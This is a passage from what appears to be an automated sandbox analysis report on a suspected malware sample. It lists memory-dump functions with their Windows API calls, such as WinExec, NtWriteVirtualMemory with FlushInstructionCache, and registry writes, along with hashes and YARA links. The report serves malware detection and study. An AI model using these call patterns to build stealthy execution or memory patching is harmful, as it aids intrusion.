                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • WinExec.KERNEL32(?,?), ref: 02CA8624
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                      • String ID: Kernel32$WinExec
                                                                      • API String ID: 2292790416-3609268280
                                                                      • Opcode ID: 9d0a9b9c47fdc8b01f599689b3526c3313dee23b61f89cc4e0edc5de4126508f
                                                                      • Instruction ID: 5438314b02827fc991382d1040a0af273393a223d38dc9a5a0c9938e582668e4
                                                                      • Opcode Fuzzy Hash: 9d0a9b9c47fdc8b01f599689b3526c3313dee23b61f89cc4e0edc5de4126508f
                                                                      • Instruction Fuzzy Hash: EF018C74784205BFFB14EFA8DC21F5EB7EEEB09B04F514520B900D2B50D730AD12AA24
                                                                      Function 02CA85BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • WinExec.KERNEL32(?,?), ref: 02CA8624
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                      • String ID: Kernel32$WinExec
                                                                      • API String ID: 2292790416-3609268280
                                                                      • Opcode ID: fdda31c21b79cf0f3a230a18154816f9cf4ad098edb5d4862612e6bac559fc16
                                                                      • Instruction ID: 5156e0a6bf450016b82ecb7fdb24d82172309c39cea9c24ffc97c911300ea186
                                                                      • Opcode Fuzzy Hash: fdda31c21b79cf0f3a230a18154816f9cf4ad098edb5d4862612e6bac559fc16
                                                                      • Instruction Fuzzy Hash: 5BF08C74684205BFFB14EFA8DC21F5EB7EEEB09B04F514520B900D2B50D730AD12AA24
                                                                      Function 02CA5C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CA5D74,?,?,02CA3900,00000001), ref: 02CA5C88
                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CA5D74,?,?,02CA3900,00000001), ref: 02CA5CB6
                                                                        • Part of subcall function 02C97D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02CA3900,02CA5CF6,00000000,02CA5D74,?,?,02CA3900), ref: 02C97DAA
                                                                        • Part of subcall function 02C97F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02CA3900,02CA5D11,00000000,02CA5D74,?,?,02CA3900,00000001), ref: 02C97FB7
                                                                      • GetLastError.KERNEL32(00000000,02CA5D74,?,?,02CA3900,00000001), ref: 02CA5D1B
                                                                        • Part of subcall function 02C9A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02C9C3D9,00000000,02C9C433), ref: 02C9A797
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                      • String ID:
                                                                      • API String ID: 503785936-0
                                                                      • Opcode ID: 66f7260417fec3a22194d52c6d1010fbb75450e12f9c9b3f8b73907295bce040
                                                                      • Instruction ID: d8eb57903d6abc87bc6f1aa25806638d2541ac8ca973871861aaefedcb3399f0
                                                                      • Opcode Fuzzy Hash: 66f7260417fec3a22194d52c6d1010fbb75450e12f9c9b3f8b73907295bce040
                                                                      • Instruction Fuzzy Hash: E8319170E006499FDF00EFA8C999BDEBBF6AB48704F908065E504AB390D7755E05DFA1
                                                                      Function 02CAF212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02E0BA58), ref: 02CAF258
                                                                      • RegSetValueExA.ADVAPI32(00000BF4,00000000,00000000,00000001,00000000,0000001C,00000000,02CAF2C3), ref: 02CAF290
                                                                      • RegCloseKey.ADVAPI32(00000BF4,00000BF4,00000000,00000000,00000001,00000000,0000001C,00000000,02CAF2C3), ref: 02CAF29B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenValue
                                                                      • String ID:
                                                                      • API String ID: 779948276-0
                                                                      • Opcode ID: b17cc1dfb449c760ee1bcc07e592361677ea78422cb408098997258b7a8cd9e5
                                                                      • Instruction ID: e5a4f6ae5f64e3ec078b5258db7ee23097bb0c0c66022970265b18a62c89fc0b
                                                                      • Opcode Fuzzy Hash: b17cc1dfb449c760ee1bcc07e592361677ea78422cb408098997258b7a8cd9e5
                                                                      • Instruction Fuzzy Hash: 7A115871A40204AFEF14EFA9D895A9E77EDEB08308B414465B504D7650DA35EE82EF50
                                                                      Function 02CAF214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02E0BA58), ref: 02CAF258
                                                                      • RegSetValueExA.ADVAPI32(00000BF4,00000000,00000000,00000001,00000000,0000001C,00000000,02CAF2C3), ref: 02CAF290
                                                                      • RegCloseKey.ADVAPI32(00000BF4,00000BF4,00000000,00000000,00000001,00000000,0000001C,00000000,02CAF2C3), ref: 02CAF29B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenValue
                                                                      • String ID:
                                                                      • API String ID: 779948276-0
                                                                      • Opcode ID: 9837e0747cc41cdb383ad7503aafe0a9132f1203fa87a1aa9bed1fb3e3311007
                                                                      • Instruction ID: 617b7583bef40c4da0bef06ded863a133541ef5c967e2e0c76135f206742524c
                                                                      • Opcode Fuzzy Hash: 9837e0747cc41cdb383ad7503aafe0a9132f1203fa87a1aa9bed1fb3e3311007
                                                                      • Instruction Fuzzy Hash: DA115871A40204AFEF14EFA9D895A9E77ADEB08308B414465B504D7650DA35EA82EF50
                                                                      Function 02C9E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 6880acbe9195adb00f874197dde1e4c0fb171a79f8a3f677dceed6f2f7f70997
                                                                      • Instruction ID: 4ee27cd9c8dff8383399bd790c41e161f2c6065e4c79884b704b418d0c52a969
                                                                      • Opcode Fuzzy Hash: 6880acbe9195adb00f874197dde1e4c0fb171a79f8a3f677dceed6f2f7f70997
                                                                      • Instruction Fuzzy Hash: EBF0AF35708110D79F24FB3ADC8C669279A7FA43407005437E80E9B211CB64CE85DBA2
                                                                      Function 02C94D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SysFreeString.OLEAUT32(02CAF4A4), ref: 02C94C6E
                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 02C94D5B
                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02C94D6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 986138563-0
                                                                      • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                      • Instruction ID: bb898572b24b910852ba9efa4bd164a4b24dd4d8177a7882394f2cf918023d53
                                                                      • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                      • Instruction Fuzzy Hash: 70E012B9205A066EEF287F219D49B3B332AAFC2784B188499E800CA158D778D541FD38
                                                                      Function 02CA70DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SysFreeString.OLEAUT32(?), ref: 02CA73DA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString
                                                                      • String ID: H
                                                                      • API String ID: 3341692771-2852464175
                                                                      • Opcode ID: 9b48359d1732df687722d202faab27cdebe86e433f926cd380fe3d726a2b49f0
                                                                      • Instruction ID: 207be40b0e0eb205b4d3e091a40066edd35b7eb1a05f197c5964aacac872698c
                                                                      • Opcode Fuzzy Hash: 9b48359d1732df687722d202faab27cdebe86e433f926cd380fe3d726a2b49f0
                                                                      • Instruction Fuzzy Hash: F4B1E174A01609DFDB15CF99D490A9DFBF2FF89318F258169E909AB320D730A949CF50
                                                                      Function 02C9E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantCopy.OLEAUT32(00000000,00000000), ref: 02C9E781
                                                                        • Part of subcall function 02C9E364: VariantClear.OLEAUT32(?), ref: 02C9E373
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy
                                                                      • String ID:
                                                                      • API String ID: 274517740-0
                                                                      • Opcode ID: a2bf8d49fc14a338ab841a22601a5210ecfd8d29bb5f4ede4053dee793198170
                                                                      • Instruction ID: a3e9b024ba49b717b3e8b29d96436c21630fc375d976fe01de2ef11f6fa7d4b0
                                                                      • Opcode Fuzzy Hash: a2bf8d49fc14a338ab841a22601a5210ecfd8d29bb5f4ede4053dee793198170
                                                                      • Instruction Fuzzy Hash: 6A11E570710210C7CF34EF6DC8CCAAA37DAAFA4751B009467E50A8B615DB31CC41EAA3
                                                                      Function 02C9E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitVariant
                                                                      • String ID:
                                                                      • API String ID: 1927566239-0
                                                                      • Opcode ID: 225397317a113d876d0f7095bb45c798ce4f68b2f9424edd836c550d9f2efff5
                                                                      • Instruction ID: 25553cf29f87da6975c82fde682e606d0c47810558deaeed2bbca60578c7ad8b
                                                                      • Opcode Fuzzy Hash: 225397317a113d876d0f7095bb45c798ce4f68b2f9424edd836c550d9f2efff5
                                                                      • Instruction Fuzzy Hash: 25315E72A00218EBEF11DFE9C88CAAA77E8EB5E704F444466F909D3250D334DA50CBA1
                                                                      Function 02CA89D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                        • Part of subcall function 02CA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
                                                                        • Part of subcall function 02CA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CA83C2), ref: 02CA83A4
                                                                      • FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                      • String ID:
                                                                      • API String ID: 1478290883-0
                                                                      • Opcode ID: 60b68c1d3ce256576e3e2e85dc858beef83db7a35e93b7e802aee5a8490637d7
                                                                      • Instruction ID: 991c0b0239387c9a8f04a5f77933a22299a0d44bbf6b846f88576c9294a83211
                                                                      • Opcode Fuzzy Hash: 60b68c1d3ce256576e3e2e85dc858beef83db7a35e93b7e802aee5a8490637d7
                                                                      • Instruction Fuzzy Hash: DF2130B0BC0201BFFB10FBA4EC16B9EB7AEAB04704F500560B555E7690D674AD01AA19
                                                                      Function 02CA6D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(00000000,?,00000000,02CA6DB9,?,?,?,00000000), ref: 02CA6D99
                                                                        • Part of subcall function 02C94C60: SysFreeString.OLEAUT32(02CAF4A4), ref: 02C94C6E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeFromProgString
                                                                      • String ID:
                                                                      • API String ID: 4225568880-0
                                                                      • Opcode ID: c49ee841b2b55c4e2ff626b9e6d427bdb2f15a24fc537a8c7d60fbb0631a8469
                                                                      • Instruction ID: 40e79258e9b7148082e893e92975f60aebb376e3133d8ed8b94b9dcecb603cea
                                                                      • Opcode Fuzzy Hash: c49ee841b2b55c4e2ff626b9e6d427bdb2f15a24fc537a8c7d60fbb0631a8469
                                                                      • Instruction Fuzzy Hash: 72E02B366007087FEF25EB76DC51D4E77EDDF8A744B6104B1E400D3500D9316E00E8A0
                                                                      Function 02C95868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C95886
                                                                        • Part of subcall function 02C95ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C90000,02CBE790), ref: 02C95AE8
                                                                        • Part of subcall function 02C95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBE790), ref: 02C95B06
                                                                        • Part of subcall function 02C95ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBE790), ref: 02C95B24
                                                                        • Part of subcall function 02C95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C95B42
                                                                        • Part of subcall function 02C95ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C95B8B
                                                                        • Part of subcall function 02C95ACC: RegQueryValueExA.ADVAPI32(?,02C95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C95BD1,?,80000001), ref: 02C95BA9
                                                                        • Part of subcall function 02C95ACC: RegCloseKey.ADVAPI32(?,02C95BD8,00000000,?,?,00000000,02C95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C95BCB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Open$FileModuleNameQueryValue$Close
                                                                      • String ID:
                                                                      • API String ID: 2796650324-0
                                                                      • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                      • Instruction ID: cfc6b651c182c6944ced693c85d06995abdd2f21e1fb4a1c0e6f85087394788a
                                                                      • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                      • Instruction Fuzzy Hash: BDE06D75A403149FCF10DF98C8C4B5633D8AF48790F440961EC58CF246D7B0DA108BD4
                                                                      Function 02C97DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02C97DF4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
